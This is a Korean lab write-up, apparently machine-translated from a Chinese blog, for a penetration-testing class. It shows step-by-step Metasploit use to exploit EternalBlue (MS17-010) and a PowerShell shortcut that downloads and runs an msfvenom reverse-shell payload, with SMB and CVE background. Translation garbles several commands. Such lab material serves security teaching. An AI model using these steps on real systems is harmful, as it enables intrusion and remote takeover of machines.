정보시스템 보안 - KALI 및 Metasploit 기반 침투 테스트

실험  2   KALI Metasploit 기반  침투 테스트   

2.1  실험명

"  KALI   Metasploit 기반  침투 테스트 "

2.2  실험 목적

1.  침투 테스트 방법에 익숙하신 분

2.  침투 테스트 도구  Kali   Metasploit  사용에 익숙합니다.

2.3  실험단계 및 내용

1. 칼리 시스템설치  

2. 칼리 에서 1~2개의 공격툴을선택    .

공격 1:  MSF를 사용하여 "Eternal Blue" 취약점 재현

실험 환경: Win 7 (방화벽을 끄고  SMB  서비스 활성화 );

칼리  리눅스 ( 메타스플로잇 - 프레임워크  6.2.26 )

1   메타스플로 잇 시작 _ 

터미널에 msfconsole을 입력하세요.

2   쿼리 활용 모듈

사용할 수 있는 모듈을 확인하려면 터미널에 검색  ms 17_010 을  입력하세요 .

3   감지 모듈 사용

 터미널 에 useaux  / scanner / smb / smb_ms 17_010 입력하세요 .

4감지   범위 설정

 RHOSTS를 구성해야 하는 터미널에 show  options를  입력합니다 . 

 터미널에 set  rhosts  192.168.3.0/24  입력하거나 ( 현재 네트워크 세그먼트를 검색하도록 설정 )  set rhosts    192.168.3.1 - 192.168.3.10 범위를 설정할 수 있습니다 . 

5   감지 시작

 감지를 실행하려면 터미널에 run을  입력하세요 .

위 그림에 따르면  IP 주소가 192.168.3.8   인 시스템에 취약점이 있음을 알 수 있습니다.  

6   취약점 악용 시작

먼저 터미널에  ms 17_010 검색을 입력  하고 모듈 사용을 사용하십시오.  

익스플로잇 / windows / smb / ms 17_010_ Eternalblue

7   활용 모듈 구성

모듈 표시  옵션을 구성하여   대상 머신 세트  rhost  192.168.3.8을 구성합니다.   여기에  다섯 번째 단계에서 검색된  IP를 입력합니다 .  

8   공격을 수행한다

터미널에  run 을 입력하세요  .  승리를  본다는 것은 공격이 성공했다는 것을 의미하며 당신은  미터프리터를 얻게 됩니다 .

공격 2: "Stuxnet III" 리바운드  

실험 환경: Win 10 (방화벽 꺼짐 );

칼리  리눅스 ( 메타스플로잇 - 프레임워크  6.2.26 )

1.  MSF를 사용하여  백도어 생성 

msf   내에 입력 : msfvenom   - p   windows /x64/ meterpreter / reverse _ tcp   lhost =  192 .168.3.23  lport =4456 - fph - Reflection >/ var / www / html / link . ps 1

2.  kali 에서  Apache 2 를 엽니다.  

터미널에 입력: service  apache 2 start

3.  제어되는 컴퓨터에 바로가기 만들기

powershell        - 창 스타일        숨김        - exec        우회        -c " IEX        ( 새 항목 - 개체

그물 . 웹클라이언트 ). DownloadString (' http://192.168.204.135/link.ps1 '); 시험 . 추신 1"

4   MSF 터미널 로 돌아가서  모니터링을 구성합니다. 

msf  내로 진입 : 익스플로잇 / 멀티 / 핸들러 사용 

5   페이로드 구성 _ 

 페이로드  설정 /x64/ meterpreter / reverse _ tcp

msf  에 입력 : 옵션 구성 페이로드 표시    

LHOST   LPORT를  설정하고 maf  입력합니다 .

 lhost 설정  < 현재 컴퓨터  IP >   LHOST 설정 

 lport 설정  < 비어 있는 포트 >   LPORT 설정 

6.  모니터링 실행

msf  에 입력 : 실행  또는  악용

대상 컴퓨터에 들어가서 대상 컴퓨터에서 만든 바로 가기를 실행하고 잠시 기다려 미터  프리터를 얻습니다 .

2.4  주요 실험 과정 및 분석

공격 1:  MSF를 사용하여 'Eternal Blue  ' 취약점 재현 

CVE -2017-0144 (Eternal Blue라고도 함)는  2017년 4월 14일 저녁 에 처음 발생했습니다.  Windows 시스템 SMB 프로토콜 취약점을 이용하여 시스템 최고 권한을 얻어 손상된 시스템을 제어하는 ​​방법입니다. 컴퓨터. 2017년          5월 12일 에도 범죄자들은 ​​" Eternal Blue"를 수정하여 랜섬웨어 바이러스를 전 세계적 으로 대규모 랜섬웨어 공격을 일으키고 심지어 학교 , 대기업, 정부 및 기타 기관에 영향을 미쳤습니다     . 파일 .

SMB  는 프로토콜 서버 정보 블록입니다. 클라이언트 / 서버, 요청 / 응답 프로토콜입니다.  SMB 프로토콜을 통해 파일, 프린터, 명명된 파이프와 같은 리소스를 컴퓨터 간에 공유할 수 있습니다.  컴퓨터의 네트워크 환경은  SMB   로 구현 됩니다. SMB  프로토콜은 애플리케이션 계층과 세션 계층에서 작동하며  TCP / IP  프로토콜 위에서 사용할 수 있습니다. SMB는  TCP 포트 139  TCP 포트 445를 사용합니다 . 

SMB 작동  방식 :

( 1 ) 먼저 클라이언트는  SMB  negport   요청 데이터그램을 보내고 지원하는 모든 SMB 프로토콜 버전을 나열 합니다 . 요청 메시지를 받은 후 서버는 요청에 응답하고 사용하려는 SMB 프로토콜 버전을 나열합니다. 사용할      수 있는  0 XFFFFH를 반환  하고 통신을 종료한다.

( 2 ) 프로토콜이 결정된 후 클라이언트 프로세스는 서버에 대한 사용자 또는 공유 인증을 시작하며, 이 프로세스는  SessionupX  요청 패킷을 전송하여 구현됩니다. 클라이언트는 사용자 이름과 비밀번호 또는 간단한 비밀번호를 서버에 보내고 , 서버는  SessionupX  응답 패킷을 보내 연결을 허용하거나 거부합니다 .

( 3 ) 클라이언트와 서버가 협상과 인증을 완료하면  Tcon 또는  TconX  SMB  데이터그램을 보내고  액세스하려는 네트워크 리소스의 이름을 나열한 다음  연결을  나타내는 TconX 응답 데이터그램을 보냅니다. 아니면 거절하세요.

( 4 ) 해당 리소스에 연결한 후 SMB  클라이언트는 SMB 열기 를 통해  파일을 열고 , SMB  읽기를 통해    파일을 읽고 ,  SMB 쓰기를 통해 파일을 쓰고  ,  SMB 닫기 를 통해 파일을 닫을 수 있습니다  . 

Eternal Blue는  Windows SMB 서비스가 SMB v1 요청을 처리할 때 발생하는 취약점으로, 이 취약점을 공격자  대상 시스템에서 임의 코드를 실행할 있습니다  . Eternal Blue 취약점을 통해 445 파일 공유 포트 가 열려 있는 Windows 시스템을 검사 하며, 범죄자는 사용자 조작 없이 컴퓨터와 서버가 켜져 있는 한        랜섬웨어 인터넷에 연결되어 있습니다 . 악성 프로그램.

공격 2: "Stuxnet III  " 리바운드  

2017년 6  13일 마이크로소프트는 CVE-2017-8464 라는 취약점 공지를 공식 발표했는데, 공식적으로는 윈도우 시스템에 바로가기 구문 분석 시 임의의 코드를 원격으로 실행할 수 있는 고위험 취약점이 있다고 소개했다.해커는  U 디스크를 통해 이를 실행할 수 있다. , 네트워크 공유 등 취약점, 사용자 시스템의 완전한 제어 및 보안 위험의 고위험 일반적으로 lnk 입니다 . lnk 는 Windows 시스템 에 있는 응용 프로그램 바로 가기 파일의 파일 형식 접미사 입니다 . 공격받은 머신이 공격 lnk가 포함된 USB 디스크를 삽입한 후             쉘이 리바운드 됩니다 . 심지어 격리된 인트라넷도 인터넷에 접속하지 않고도 공격을 받을 수 있습니다.  

본 취약점은 악성 바로가기를 생성하고, 악성 실행 스크립트를 포함하고 있으며, 악성 바로가기를 클릭하여 컴퓨터를 바이러스에 감염시켜 원격으로 제어할 수 있게 합니다.

추천

출처blog.csdn.net/weixin_49816179/article/details/135440845